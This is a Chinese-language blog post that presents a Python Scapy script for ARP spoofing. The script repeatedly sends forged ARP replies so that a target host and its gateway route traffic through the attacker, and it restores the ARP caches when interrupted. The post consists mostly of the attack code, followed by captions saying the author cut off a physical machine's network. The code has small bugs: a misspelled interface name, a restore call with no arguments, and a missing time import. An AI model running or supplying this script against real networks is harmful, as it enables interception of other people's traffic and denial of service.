该博客展示了如何在Kali Linux环境下,利用Python的Scapy库执行ARP数据包攻击。代码实现了ARP欺骗,通过不断发送伪造的ARP包,将目标主机的流量重定向到攻击者。当攻击结束,会发送恢复 ARP 缓冲的包,使网络恢复正常。
环境:kali
工具:python3
不说废话,直接上代码
#arp数据包攻击
from scapy.all import *
import sys
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
'''
arp缓冲表恢复
'''
print("[*] 恢复ARP缓冲......")
#构造ARP包
send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac))
def attack_target(gateway_ip,gateway_mac,target_ip,target_mac):
#scapy构造ARP包
#欺骗目标主机,我是网关
#发给目标主机(target_ip)
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst = target_mac
#欺骗网关,我是目标主机
#发给网关(gateway_ip)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print("[*] 正在进行ARP攻击 [CTRL+C 结束]")
while True:
try:
#循环发送arp包
send(poison_target)
send(poison_gateway)
#休眠
time.sleep(2)
#捕获键盘中断
except KeyboardInterrupt:
#ARP缓冲恢复
restore_target()
break
print("[*] ARP攻击结束")
return
pass
def main(gateway_ip,target_ip):
#网关(kali)
internface = "etho"
#设置网卡
conf.iface = internface
#关闭提示信息
conf.verb = 0
print("[*] 网卡:%s"%internface)
#获取网关MAC
gateway_mac = getmacbyip(gateway_ip)
if gateway_mac is None:
print ("[!] 获取网关MAC失败。 Exiting")
sys.exit(0)
else:
print("[*] 网关:%s MAC: %s"%(gateway_ip,gateway_mac))
#获取目标主机MAC
target_mac = getmacbyip(target_ip)
if target_mac is None:
print ("[!] 获取目标主机网关MAC失败。 Exiting")
sys.exit(0)
else:
print("[*] 目标主机:%s MAC: %s "%(target_ip,target_mac))
#开始攻击
attack_target(gateway_ip, gateway_mac, target_ip, target_mac)
if __name__ == '__main__':
gateway_ip = input("Starting to input target-gateway:")
target_ip = input("Starting to input target-address-ip:")
main(gateway_ip,target_ip)
试验截图:
物理机网卡信息:
检查物理机网络是否畅通
开始运行脚本,开始攻击物理机
物理机再次检查网络,攻击成功!!
结束脚本,物理机网络畅通!
扫一扫
490
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
